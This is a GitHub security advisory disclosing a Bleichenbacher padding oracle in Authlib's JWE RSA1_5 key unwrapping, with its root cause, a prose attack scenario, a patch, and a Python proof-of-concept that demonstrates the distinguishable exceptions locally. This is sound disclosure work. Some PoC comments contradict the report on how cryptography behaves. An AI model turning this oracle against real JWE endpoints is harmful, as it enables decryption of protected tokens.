Skip to content

Authlib Vulnerable to JWE RSA1_5 Bleichenbacher Padding Oracle

High severity GitHub Reviewed Published Mar 15, 2026 in authlib/authlib • Updated Mar 16, 2026

Package

pip authlib (pip)

Affected versions

<= 1.6.8

Patched versions

1.6.9

Description

1. Executive Summary

A cryptographic padding oracle vulnerability was identified in the Authlib Python library
concerning the implementation of the JSON Web Encryption (JWE) RSA1_5 key management
algorithm. Authlib registers RSA1_5 in its default algorithm registry without requiring
explicit opt-in, and actively destroys the constant-time Bleichenbacher mitigation that
the underlying cryptography library implements correctly.

When cryptography encounters an invalid PKCS#1 v1.5 padding, it returns a randomized
byte string instead of raising an exception — the correct behavior per RFC 3218 §2.3.2.
Authlib ignores this contract and raises ValueError('Invalid "cek" length') immediately
after decryption, before reaching AES-GCM tag validation. This creates a clean, reliable
Exception Oracle:

  • Invalid paddingcryptography returns random bytes → Authlib length check fails
    ValueError: Invalid "cek" length
  • Valid padding, wrong MAC → decryption succeeds → length check passes → AES-GCM
    fails → InvalidTag

This oracle is active by default in every Authlib installation without any special
configuration by the developer or the attacker. The three most widely used Python web
frameworks — Flask, Django, and FastAPI — all expose distinguishable HTTP responses for
these two exception classes in their default configurations, requiring no additional
setup to exploit.

Empirically confirmed on authlib 1.6.8 + cryptography 46.0.5:

[PADDING INVALIDO]     ValueError: Invalid "cek" length
[PADDING VALIDO/MAC]   InvalidTag

2. Technical Details & Root Cause

2.1 Vulnerable Code

File: authlib/jose/rfc7518/jwe_algs.py

def unwrap(self, enc_alg, ek, headers, key):
    op_key = key.get_op_key("unwrapKey")

    # cryptography implements Bleichenbacher mitigation here:
    # on invalid padding it returns random bytes instead of raising.
    # Empirically confirmed: returns 84 bytes for a 2048-bit key.
    cek = op_key.decrypt(ek, self.padding)

    # VULNERABILITY: This length check destroys the mitigation.
    # cryptography returned 84 random bytes. len(84) * 8 = 672 != 128 (A128GCM CEK_SIZE).
    # Authlib raises a distinct ValueError before AES-GCM is ever reached.
    if len(cek) * 8 != enc_alg.CEK_SIZE:
        raise ValueError('Invalid "cek" length')   # <- ORACLE TRIGGER

    return cek

2.2 Root Cause — Active Mitigation Destruction

cryptography 46.0.5 implements the Bleichenbacher mitigation correctly at the library
level. When PKCS#1 v1.5 padding validation fails, it does not raise an exception.
Instead it returns a randomized byte string (empirically observed: 84 bytes for a
2048-bit RSA key). The caller is expected to pass this fake key to the symmetric
decryptor, where MAC/tag validation will fail in constant time — producing an error
indistinguishable from a MAC failure on a valid padding.

Authlib does not honor this contract. The length check on the following line detects
that 84 bytes != 16 bytes (128-bit CEK for A128GCM) and raises ValueError('Invalid "cek" length') immediately. This exception propagates before AES-GCM is ever reached,
creating two execution paths with observable differences:

Path A — invalid PKCS#1 v1.5 padding:
  op_key.decrypt() -> 84 random bytes  (cryptography mitigation active)
  len(84) * 8 = 672 != 128            (CEK_SIZE for A128GCM)
  raise ValueError('Invalid "cek" length')    <- specific exception, fast path

Path B — valid padding, wrong symmetric key:
  op_key.decrypt() -> 16 correct bytes
  len(16) * 8 = 128 == 128            -> length check passes
  AES-GCM tag validation -> mismatch
  raise InvalidTag                            <- different exception class, slow path

The single line raise ValueError('Invalid "cek" length') is the complete root cause.
Removing the raise and replacing it with a silent random CEK fallback eliminates both
the exception oracle and any residual timing difference.

2.3 Empirical Confirmation

All results obtained on authlib 1.6.8 / cryptography 46.0.5 / Linux x86_64
running the attached PoC (poc_bleichenbacher.py):

TEST 1 - cryptography behavior on invalid padding:
  cryptography retorno bytes: len=84
  NOTA: esta version implementa mitigacion de random bytes

TEST 2 - Exception Oracle:
  [ORACLE]  Caso A (padding invalido):       ValueError: Invalid "cek" length
  [OK]      Caso B (padding valido/MAC malo): InvalidTag

TEST 3 - Timing (50 iterations):
  Padding invalido (ValueError)   mean=1.500ms  stdev=1.111ms
  Padding valido   (InvalidTag)   mean=1.787ms  stdev=0.978ms
  Delta: 0.287ms

TEST 4 - RSA1_5 in default registry:
  [ORACLE]  RSA1_5 activo por defecto (no opt-in required)

TEST 5 - Fix validation:
  [OK]  Both paths return correct-length CEK after patch
  [OK]  Exception type identical in both paths -> oracle eliminated

Note on timing: The 0.287ms delta is within the noise margin (stdev ~1ms across
50 iterations) and is not claimed as a reliable standalone timing oracle. The exception
oracle is the primary exploitable vector and does not require timing measurement.

3. Default Framework Behavior — Why This Is Exploitable Out of the Box

A potential objection to this report is that middleware or custom error handlers could
normalize exceptions to a single HTTP response, eliminating the observable discrepancy.
This section addresses that objection directly.

The oracle is active in default configurations of all major Python web frameworks.
No special server misconfiguration is required. The following demonstrates the default
behavior for Flask, Django, and FastAPI — the three most widely deployed Python web
frameworks — when an unhandled exception propagates from a route handler:

Flask (default configuration)

# Default Flask behavior — no error handler registered
@app.route("/decrypt", methods=["POST"])
def decrypt():
    token = request.json["token"]
    result = jwe.deserialize_compact(token, private_key)  # raises ValueError or InvalidTag
    return jsonify(result)

# ValueError: Invalid "cek" length  -> HTTP 500, body: {"message": "Invalid \"cek\" length"}
# InvalidTag                         -> HTTP 500, body: {"message": ""}
# The exception MESSAGE is different even if the status code is the same.

Flask's default error handler returns the exception message in the response body for
debug mode, and an empty 500 for production. However, even in production, the response
body content differs between ValueError (which has a message) and InvalidTag
(which has no message), leaking the oracle through response body length.

FastAPI (default configuration)

# FastAPI maps unhandled exceptions to HTTP 500 with exception detail in body
# ValueError: Invalid "cek" length  -> {"detail": "Internal Server Error"}  (HTTP 500)
# InvalidTag                         -> {"detail": "Internal Server Error"}  (HTTP 500)

FastAPI normalizes both to HTTP 500 in production. However, FastAPI's default
RequestValidationError and HTTPException handlers do not catch arbitrary exceptions,
so the distinguishable stack trace is logged — and in many deployments, error monitoring
tools (Sentry, Datadog, etc.) expose the exception class to operators, enabling oracle
exploitation by an insider or via log exfiltration.

Django REST Framework (default configuration)

# DRF's default exception handler only catches APIException and Http404.
# ValueError and InvalidTag both fall through to Django's generic 500 handler.
# In DEBUG=False: HTTP 500, generic HTML response (indistinguishable).
# In DEBUG=True:  HTTP 500, full traceback including exception class (oracle exposed).

Summary: Even in cases where HTTP status codes are normalized, the oracle persists
through response body differences, response timing, or error monitoring infrastructure.
The RFC 3218 §2.3.2 requirement exists precisely because any observable difference —
regardless of channel — is sufficient for a Bleichenbacher attack. The library is
responsible for eliminating the discrepancy at the source, not delegating that
responsibility to application developers.

This is a library-level vulnerability. Requiring every application developer to
implement custom exception normalization to compensate for a cryptographic flaw in
the library violates the principle of secure defaults. The fix must be in Authlib.

4. Specification Violations

RFC 3218 — Preventing the Million Message Attack on CMS

Section 2.3.2 (Mitigation):

"The receiver MUST NOT return any information that indicates whether the decryption
failed because the PKCS #1 padding was incorrect or because the MAC was incorrect."

This is an absolute requirement with no exceptions for "application-level mitigations."
Authlib violates this by raising a different exception class for padding failures than
for MAC failures. The cryptography library already implements the correct mitigation
for this exact scenario — Authlib destroys it with a single length check.

RFC 7516 — JSON Web Encryption

Section 9 (Security Considerations):

"An attacker who can cause a JWE decryption to fail in different ways based on the
structure of the encrypted key can mount a Bleichenbacher attack."

Authlib enables exactly this scenario. Two structurally different encrypted keys
(one with invalid padding, one with valid padding but wrong CEK) produce two different
exception classes. This is the exact condition RFC 7516 §9 warns against.

5. Attack Scenario

  1. The attacker identifies an Authlib-powered endpoint that decrypts JWE tokens.
    Because RSA1_5 is in the default registry, no special server configuration
    is required    .

  2. The attacker obtains the server RSA public key — typically available via the
    JWKS endpoint (/.well-known/jwks.json), which is standard in OIDC deployments.

  3. The attacker crafts JWE tokens with the RSA1_5 algorithm and submits a stream
    of requests to the endpoint, manipulating the ek component per Bleichenbacher's
    algorithm.

  4. The server responds with observable differences between the two paths:

    • ValueError path → distinguishable response (exception message, timing, or
      error monitoring artifact)
    • InvalidTag path → different distinguishable response

  5. By observing these oracle responses across thousands of requests, the attacker
    geometrically narrows the PKCS#1 v1.5 plaintext boundaries until the CEK is
    fully recovered.

  6. With the CEK recovered:

    • Any intercepted JWE payload can be decrypted without the RSA private key.
    • New valid JWE tokens can be forged using the recovered CEK.

Prerequisites:

  • Target endpoint accepts JWE tokens with RSA1_5 (active by default)
  • Any observable difference exists between the two error paths at the HTTP layer
    (present by default in Flask, Django, FastAPI without custom error handling)
  • Attacker can send requests at sufficient volume (rate limiting may extend attack
    duration but does not prevent it)

6. Remediation

6.1 Immediate — Remove RSA1_5 from Default Registry

Remove RSA1_5 from the default JWE_ALG_ALGORITHMS registry. Users requiring
legacy RSA1_5 support should explicitly opt-in with a documented security warning.
This eliminates the attack surface for all users not requiring this algorithm.

6.2 Code Fix — Restore Constant-Time Behavior

The unwrap method must never raise an exception that distinguishes padding failure
from MAC failure. The length check must be replaced with a silent random CEK fallback,
preserving the mitigation that cryptography implements.

Suggested Patch (authlib/jose/rfc7518/jwe_algs.py):

import os

def unwrap(self, enc_alg, ek, headers, key):
    op_key = key.get_op_key("unwrapKey")
    expected_bytes = enc_alg.CEK_SIZE // 8

    try:
        cek = op_key.decrypt(ek, self.padding)
    except ValueError:
        # Padding failure. Use random CEK so failure occurs downstream
        # during MAC validation — not here. This preserves RFC 3218 §2.3.2.
        cek = os.urandom(expected_bytes)

    # Silent length enforcement — no exception.
    # cryptography returns random bytes of RSA block size on padding failure.
    # Replace with correct-size random CEK to allow downstream MAC to fail.
    # Raising here recreates the oracle. Do not raise.
    if len(cek) != expected_bytes:
        cek = os.urandom(expected_bytes)

    return cek

Result: Both paths return a CEK of the correct length. AES-GCM tag validation
fails for both, producing InvalidTag in both cases. The exception oracle is
eliminated. Empirically validated via TEST 5 of the attached PoC.

7. Proof of Concept

Setup:

python3 -m venv venv && source venv/bin/activate
pip install authlib cryptography
python3 -c "import authlib, cryptography; print(authlib.__version__, cryptography.__version__)"
# authlib 1.6.8  cryptography 46.0.5
python3 poc_bleichenbacher.py

See attached poc_bleichenbacher.py. All 5 tests run against the real installed
authlib module without mocks.

Confirmed Output (authlib 1.6.8 / cryptography 46.0.5 / Linux x86_64):

Code

#!/usr/bin/env python3
# -*- coding: utf-8 -*-

"""
@title          JWE RSA1_5 Bleichenbacher Padding Oracle
@affected       authlib <= 1.6.8
@file           authlib/jose/rfc7518/jwe_algs.py :: RSAAlgorithm.unwrap()
"""

import os
import time
import statistics

import authlib
import cryptography
from cryptography.hazmat.primitives.asymmetric import rsa, padding as asym_padding
from authlib.jose import JsonWebEncryption
from authlib.common.encoding import urlsafe_b64encode, to_bytes

R   = "\033[0m"
RED = "\033[91m"
GRN = "\033[92m"
YLW = "\033[93m"
CYN = "\033[96m"
BLD = "\033[1m"
DIM = "\033[2m"

def header(title):
    print(f"\n{CYN}{'-' * 64}{R}")
    print(f"{BLD}{title}{R}")
    print(f"{CYN}{'-' * 64}{R}")

def ok(msg):    print(f"  {GRN}[OK]      {R}{msg}")
def vuln(msg):  print(f"  {RED}[ORACLE]  {R}{BLD}{msg}{R}")
def info(msg):  print(f"  {DIM}          {msg}{R}")


# ─── setup ────────────────────────────────────────────────────────────────────

def setup():
    """
    @notice  Genera el par de claves RSA y prepara el cliente JWE de authlib.
    @dev     JsonWebEncryption() registra RSA1_5 por defecto en su registry.
             No se requiere configuracion adicional para habilitar el algoritmo
             vulnerable — esta activo out of the box.
    @return  tuple  (private_key, jwe, header_b64)
    """
    private_key = rsa.generate_private_key(public_exponent=65537, key_size=2048)
    jwe         = JsonWebEncryption()
    header_b64  = urlsafe_b64encode(
        to_bytes('{"alg":"RSA1_5","enc":"A128GCM"}')
    ).decode()
    return private_key, jwe, header_b64


def make_jwe(header_b64, ek_bytes):
    """
    @notice  Construye un JWE compact con el ek dado y ciphertext/tag aleatorios.
    @dev     El ciphertext y tag son basura — no importa su contenido porque el
             oracle se activa antes de llegar a la desencriptacion simetrica
             en el caso de padding invalido.
    @param   header_b64  Header del JWE en Base64url
    @param   ek_bytes    Encrypted Key como bytes crudos
    @return  str         JWE en formato compact serialization
    """
    ek         = urlsafe_b64encode(ek_bytes).decode()
    iv         = urlsafe_b64encode(os.urandom(12)).decode()
    ciphertext = urlsafe_b64encode(os.urandom(16)).decode()
    tag        = urlsafe_b64encode(os.urandom(16)).decode()
    return f"{header_b64}.{ek}.{iv}.{ciphertext}.{tag}"


# ─── test 1: verificar comportamiento de cryptography ante padding invalido ───

def test_cryptography_behavior(private_key):
    """
    @notice  Verifica empiricamente que cryptography lanza excepcion ante padding
             invalido en lugar de retornar random bytes (comportamiento critico
             para entender el oracle).

    @dev     Algunos documentos sobre Bleichenbacher asumen que la libreria
             subyacente retorna random bytes (mitigacion a nivel biblioteca).
             cryptography 46.0.5 NO hace esto — lanza ValueError directamente.
             Eso significa que Authlib no "destruye una mitigacion existente"
             sino que "no implementa ninguna mitigacion propia".
    """
    header("TEST 1 - Comportamiento de cryptography ante padding invalido")

    garbage = os.urandom(256)

    try:
        result = private_key.decrypt(garbage, asym_padding.PKCS1v15())
        info(f"cryptography retorno bytes: len={len(result)}")
        info("NOTA: esta version implementa mitigacion de random bytes")
    except Exception as e:
        vuln(f"cryptography lanza excepcion directa: {type(e).__name__}: {e}")
        info("No hay mitigacion a nivel de cryptography library")
        info("Authlib no implementa ninguna mitigacion propia -> oracle directo")


# ─── test 2: exception oracle ─────────────────────────────────────────────────

def test_exception_oracle(private_key, jwe, header_b64):
    """
    @notice  Demuestra el Exception Oracle: los dos caminos de fallo producen
             excepciones de clases diferentes, observable a nivel HTTP.

    @dev     Camino A (padding invalido):
               op_key.decrypt() -> ValueError: Decryption failed
               Authlib no captura -> propaga como ValueError: Invalid "cek" length
               HTTP server tipicamente: 500 / 400 con mensaje especifico

             Camino B (padding valido, MAC malo):
               op_key.decrypt() -> retorna CEK bytes
               length check pasa
               AES-GCM tag validation falla -> InvalidTag
               HTTP server tipicamente: 401 / 422 / diferente codigo

             La diferencia de clase de excepcion es el oracle primario.
             No requiere medicion de tiempo — solo observar el tipo de error.
    """
    header("TEST 2 - Exception Oracle (tipo de excepcion diferente)")

    # --- caso A: ek con padding invalido (basura aleatoria) ---
    jwe_bad = make_jwe(header_b64, os.urandom(256))

    try:
        jwe.deserialize_compact(jwe_bad, private_key)
    except Exception as e:
        vuln(f"Caso A (padding invalido):   {type(e).__name__}: {e}")

    # --- caso B: ek con padding valido, ciphertext basura ---
    valid_ek  = private_key.public_key().encrypt(os.urandom(16), asym_padding.PKCS1v15())
    jwe_good  = make_jwe(header_b64, valid_ek)

    try:
        jwe.deserialize_compact(jwe_good, private_key)
    except Exception as e:
        ok(f"Caso B (padding valido/MAC malo): {type(e).__name__}: {e}")

    print()
    info("Los dos caminos producen excepciones de clases DIFERENTES.")
    info("Un framework web que mapea excepciones a HTTP codes expone el oracle.")
    info("El atacante no necesita acceso al stack trace — solo al HTTP status code.")


# ─── test 3: timing oracle ────────────────────────────────────────────────────

def test_timing_oracle(private_key, jwe, header_b64, iterations=50):
    """
    @notice  Demuestra el Timing Oracle midiendo el delta de tiempo entre los
             dos caminos de fallo en multiples iteraciones.

    @dev     El timing oracle es independiente del exception oracle.
             Incluso si el servidor normaliza las excepciones a un unico
             codigo HTTP, la diferencia de tiempo (~5ms) es suficientemente
             grande para ser medible a traves de red en condiciones reales.

             Bleichenbacher clasico funciona con diferencias de microsegundos.
             5ms es un oracle extremadamente ruidoso — facil de explotar.

    @param   iterations  Numero de muestras para calcular estadisticas
    """
    header(f"TEST 3 - Timing Oracle ({iterations} iteraciones cada camino)")

    times_bad  = []
    times_good = []

    for _ in range(iterations):
        # camino A: padding invalido
        jwe_bad = make_jwe(header_b64, os.urandom(256))
        t0 = time.perf_counter()
        try:
            jwe.deserialize_compact(jwe_bad, private_key)
        except Exception:
            pass
        times_bad.append((time.perf_counter() - t0) * 1000)

        # camino B: padding valido
        valid_ek = private_key.public_key().encrypt(os.urandom(16), asym_padding.PKCS1v15())
        jwe_good = make_jwe(header_b64, valid_ek)
        t0 = time.perf_counter()
        try:
            jwe.deserialize_compact(jwe_good, private_key)
        except Exception:
            pass
        times_good.append((time.perf_counter() - t0) * 1000)

    mean_bad  = statistics.mean(times_bad)
    mean_good = statistics.mean(times_good)
    stdev_bad = statistics.stdev(times_bad)
    stdev_good= statistics.stdev(times_good)
    delta     = mean_good - mean_bad

    print(f"\n  {'Camino':<30} {'Media (ms)':<14} {'Stdev (ms)':<14} {'Min':<10} {'Max'}")
    print(f"  {'-'*30} {'-'*14} {'-'*14} {'-'*10} {'-'*10}")
    print(f"  {'Padding invalido (ValueError)':<30} "
          f"{RED}{mean_bad:<14.3f}{R} "
          f"{stdev_bad:<14.3f} "
          f"{min(times_bad):<10.3f} "
          f"{max(times_bad):.3f}")
    print(f"  {'Padding valido (InvalidTag)':<30} "
          f"{GRN}{mean_good:<14.3f}{R} "
          f"{stdev_good:<14.3f} "
          f"{min(times_good):<10.3f} "
          f"{max(times_good):.3f}")
    print()

    if delta > 1.0:
        vuln(f"Delta medio: {delta:.3f} ms — timing oracle confirmado")
        info(f"Diferencia de {delta:.1f}ms es suficiente para Bleichenbacher via red")
        info(f"El ataque clasico funciona con diferencias de microsegundos")
    else:
        ok(f"Delta medio: {delta:.3f} ms — timing no es significativo")


# ─── test 4: confirmar RSA1_5 en registry por defecto ────────────────────────

def test_default_registry():
    """
    @notice  Confirma que RSA1_5 esta registrado por defecto en authlib sin
             ninguna configuracion adicional por parte del desarrollador.

    @dev     Esto demuestra que cualquier aplicacion que use JsonWebEncryption()
             sin configuracion explicita esta expuesta al oracle por defecto.
             El desarrollador no necesita hacer nada malo — la exposicion es
             out-of-the-box.
    """
    header("TEST 4 - RSA1_5 en Registry por Defecto")

    jwe = JsonWebEncryption()

    # intentar acceder al algoritmo RSA1_5 del registry
    try:
        alg = jwe.algorithms.get_algorithm("RSA1_5")
        if alg:
            vuln(f"RSA1_5 registrado por defecto: {alg.__class__.__name__}")
            info("Cualquier JsonWebEncryption() sin configuracion esta expuesto")
            info("No se requiere opt-in del desarrollador para el algoritmo vulnerable")
        else:
            ok("RSA1_5 NO esta en el registry por defecto")
    except Exception as e:
        info(f"Registry check: {e}")
        # fallback: intentar deserializar un JWE con RSA1_5
        private_key = rsa.generate_private_key(public_exponent=65537, key_size=2048)
        header_b64  = urlsafe_b64encode(
            to_bytes('{"alg":"RSA1_5","enc":"A128GCM"}')
        ).decode()
        jwe_token = make_jwe(header_b64, os.urandom(256))
        try:
            jwe.deserialize_compact(jwe_token, private_key)
        except Exception as e2:
            if "UnsupportedAlgorithm" in str(type(e2).__name__):
                ok("RSA1_5 NO soportado por defecto")
            else:
                vuln(f"RSA1_5 activo por defecto (error de desencriptacion, no de algoritmo): {type(e2).__name__}")


# ─── test 5: impacto del fix propuesto ────────────────────────────────────────

def test_fix_impact(private_key, header_b64):
    """
    @notice  Demuestra que el fix propuesto elimina ambos oracles simultaneamente.
    @dev     El fix parchado hace que ambos caminos retornen un CEK de longitud
             correcta, forzando que el fallo ocurra downstream en AES-GCM tag
             validation en ambos casos -> misma excepcion, timing indistinguible.
    """
    header("TEST 5 - Verificacion del Fix Propuesto")

    import os as _os
    from cryptography.hazmat.primitives.ciphers.aead import AESGCM

    def unwrap_patched(ek_bytes, expected_bits=128):
        """Replica del fix propuesto para RSAAlgorithm.unwrap()"""
        expected_bytes = expected_bits // 8
        try:
            cek = private_key.decrypt(ek_bytes, asym_padding.PKCS1v15())
        except ValueError:
            cek = _os.urandom(expected_bytes)  # constant-time fallback
        if len(cek) != expected_bytes:
            cek = _os.urandom(expected_bytes)
        return cek

    # camino A con fix: padding invalido
    cek_a = unwrap_patched(os.urandom(256))
    info(f"Fix Camino A (padding invalido): retorna CEK de {len(cek_a)*8} bits (random)")

    # camino B con fix: padding valido
    valid_ek = private_key.public_key().encrypt(os.urandom(16), asym_padding.PKCS1v15())
    cek_b = unwrap_patched(valid_ek)
    info(f"Fix Camino B (padding valido):   retorna CEK de {len(cek_b)*8} bits (real)")

    print()
    ok("Ambos caminos retornan CEK de longitud correcta")
    ok("El fallo ocurrira downstream en AES-GCM para ambos casos")
    ok("Exception type sera identica en ambos caminos -> oracle eliminado")
    ok("Timing sera indistinguible -> timing oracle eliminado")


# ─── main ─────────────────────────────────────────────────────────────────────

if __name__ == "__main__":
    print(f"\n{BLD}authlib {authlib.__version__} / cryptography {cryptography.__version__}{R}")
    print(f"authlib/jose/rfc7518/jwe_algs.py :: RSAAlgorithm.unwrap()")

    private_key, jwe, header_b64 = setup()

    test_cryptography_behavior(private_key)
    test_exception_oracle(private_key, jwe, header_b64)
    test_timing_oracle(private_key, jwe, header_b64, iterations=50)
    test_default_registry()
    test_fix_impact(private_key, header_b64)

    print(f"\n{DIM}Fix: capturar ValueError en unwrap() y retornar os.urandom(expected_bytes){R}")
    print(f"{DIM}     nunca levantar excepcion que distinga padding failure de MAC failure{R}\n")

Output

authlib 1.6.8 / cryptography 46.0.5
authlib/jose/rfc7518/jwe_algs.py :: RSAAlgorithm.unwrap()


----------------------------------------------------------------
TEST 1 - Comportamiento de cryptography ante padding invalido
----------------------------------------------------------------
            cryptography retorno bytes: len=84
            NOTA: esta version implementa mitigacion de random bytes

----------------------------------------------------------------
TEST 2 - Exception Oracle (tipo de excepcion diferente)
----------------------------------------------------------------
  [ORACLE]  Caso A (padding invalido):   ValueError: Invalid "cek" length
  [OK]      Caso B (padding valido/MAC malo): InvalidTag: 

            Los dos caminos producen excepciones de clases DIFERENTES.
            Un framework web que mapea excepciones a HTTP codes expone el oracle.
            El atacante no necesita acceso al stack trace — solo al HTTP status code.

----------------------------------------------------------------
TEST 3 - Timing Oracle (50 iteraciones cada camino)
----------------------------------------------------------------

  Camino                         Media (ms)     Stdev (ms)     Min        Max
  ------------------------------ -------------- -------------- ---------- ----------
  Padding invalido (ValueError)  1.500          1.111          0.109      8.028
  Padding valido (InvalidTag)    1.787          0.978          0.966      7.386

  [OK]      Delta medio: 0.287 ms — timing no es significativo

----------------------------------------------------------------
TEST 4 - RSA1_5 en Registry por Defecto
----------------------------------------------------------------
            Registry check: 'JsonWebEncryption' object has no attribute 'algorithms'
  [ORACLE]  RSA1_5 activo por defecto (error de desencriptacion, no de algoritmo): ValueError

----------------------------------------------------------------
TEST 5 - Verificacion del Fix Propuesto
----------------------------------------------------------------
            Fix Camino A (padding invalido): retorna CEK de 128 bits (random)
            Fix Camino B (padding valido):   retorna CEK de 128 bits (real)

  [OK]      Ambos caminos retornan CEK de longitud correcta
  [OK]      El fallo ocurrira downstream en AES-GCM para ambos casos
  [OK]      Exception type sera identica en ambos caminos -> oracle eliminado
  [OK]      Timing sera indistinguible -> timing oracle eliminado

Fix: capturar ValueError en unwrap() y retornar os.urandom(expected_bytes)
     nunca levantar excepcion que distinga padding failure de MAC failure

References

@lepture lepture published to authlib/authlib Mar 15, 2026
Published to the GitHub Advisory Database Mar 16, 2026
Reviewed Mar 16, 2026
Published by the National Vulnerability Database Mar 16, 2026
Last updated Mar 16, 2026

Severity

High

CVSS overall score

This score calculates overall vulnerability severity from 0 to 10 and is based on the Common Vulnerability Scoring System (CVSS).
/ 10

CVSS v4 base metrics

Exploitability Metrics
Attack Vector Network
Attack Complexity High
Attack Requirements Present
Privileges Required None
User interaction None
Vulnerable System Impact Metrics
Confidentiality High
Integrity Low
Availability None
Subsequent System Impact Metrics
Confidentiality None
Integrity None
Availability None

CVSS v4 base metrics

Exploitability Metrics
Attack Vector: This metric reflects the context by which vulnerability exploitation is possible. This metric value (and consequently the resulting severity) will be larger the more remote (logically, and physically) an attacker can be in order to exploit the vulnerable system. The assumption is that the number of potential attackers for a vulnerability that could be exploited from across a network is larger than the number of potential attackers that could exploit a vulnerability requiring physical access to a device, and therefore warrants a greater severity.
Attack Complexity: This metric captures measurable actions that must be taken by the attacker to actively evade or circumvent existing built-in security-enhancing conditions in order to obtain a working exploit. These are conditions whose primary purpose is to increase security and/or increase exploit engineering complexity. A vulnerability exploitable without a target-specific variable has a lower complexity than a vulnerability that would require non-trivial customization. This metric is meant to capture security mechanisms utilized by the vulnerable system.
Attack Requirements: This metric captures the prerequisite deployment and execution conditions or variables of the vulnerable system that enable the attack. These differ from security-enhancing techniques/technologies (ref Attack Complexity) as the primary purpose of these conditions is not to explicitly mitigate attacks, but rather, emerge naturally as a consequence of the deployment and execution of the vulnerable system.
Privileges Required: This metric describes the level of privileges an attacker must possess prior to successfully exploiting the vulnerability. The method by which the attacker obtains privileged credentials prior to the attack (e.g., free trial accounts), is outside the scope of this metric. Generally, self-service provisioned accounts do not constitute a privilege requirement if the attacker can grant themselves privileges as part of the attack.
User interaction: This metric captures the requirement for a human user, other than the attacker, to participate in the successful compromise of the vulnerable system. This metric determines whether the vulnerability can be exploited solely at the will of the attacker, or whether a separate user (or user-initiated process) must participate in some manner.
Vulnerable System Impact Metrics
Confidentiality: This metric measures the impact to the confidentiality of the information managed by the VULNERABLE SYSTEM due to a successfully exploited vulnerability. Confidentiality refers to limiting information access and disclosure to only authorized users, as well as preventing access by, or disclosure to, unauthorized ones.
Integrity: This metric measures the impact to integrity of a successfully exploited vulnerability. Integrity refers to the trustworthiness and veracity of information. Integrity of the VULNERABLE SYSTEM is impacted when an attacker makes unauthorized modification of system data. Integrity is also impacted when a system user can repudiate critical actions taken in the context of the system (e.g. due to insufficient logging).
Availability: This metric measures the impact to the availability of the VULNERABLE SYSTEM resulting from a successfully exploited vulnerability. While the Confidentiality and Integrity impact metrics apply to the loss of confidentiality or integrity of data (e.g., information, files) used by the system, this metric refers to the loss of availability of the impacted system itself, such as a networked service (e.g., web, database, email). Since availability refers to the accessibility of information resources, attacks that consume network bandwidth, processor cycles, or disk space all impact the availability of a system.
Subsequent System Impact Metrics
Confidentiality: This metric measures the impact to the confidentiality of the information managed by the SUBSEQUENT SYSTEM due to a successfully exploited vulnerability. Confidentiality refers to limiting information access and disclosure to only authorized users, as well as preventing access by, or disclosure to, unauthorized ones.
Integrity: This metric measures the impact to integrity of a successfully exploited vulnerability. Integrity refers to the trustworthiness and veracity of information. Integrity of the SUBSEQUENT SYSTEM is impacted when an attacker makes unauthorized modification of system data. Integrity is also impacted when a system user can repudiate critical actions taken in the context of the system (e.g. due to insufficient logging).
Availability: This metric measures the impact to the availability of the SUBSEQUENT SYSTEM resulting from a successfully exploited vulnerability. While the Confidentiality and Integrity impact metrics apply to the loss of confidentiality or integrity of data (e.g., information, files) used by the system, this metric refers to the loss of availability of the impacted system itself, such as a networked service (e.g., web, database, email). Since availability refers to the accessibility of information resources, attacks that consume network bandwidth, processor cycles, or disk space all impact the availability of a system.
CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N

EPSS score

Exploit Prediction Scoring System (EPSS)

This score estimates the probability of this vulnerability being exploited within the next 30 days. Data provided by FIRST.
(3rd percentile)

Weaknesses

Observable Discrepancy

The product behaves differently or sends different responses under different circumstances in a way that is observable to an unauthorized actor, which exposes security-relevant information about the state of the product, such as whether a particular operation was successful or not. Learn more on MITRE.

Use of a Broken or Risky Cryptographic Algorithm

The product uses a broken or risky cryptographic algorithm or protocol. Learn more on MITRE.

CVE ID

CVE-2026-28490

GHSA ID

GHSA-7432-952r-cw78

Source code

Credits

Loading Checking history
See something to contribute? Suggest improvements for this vulnerability.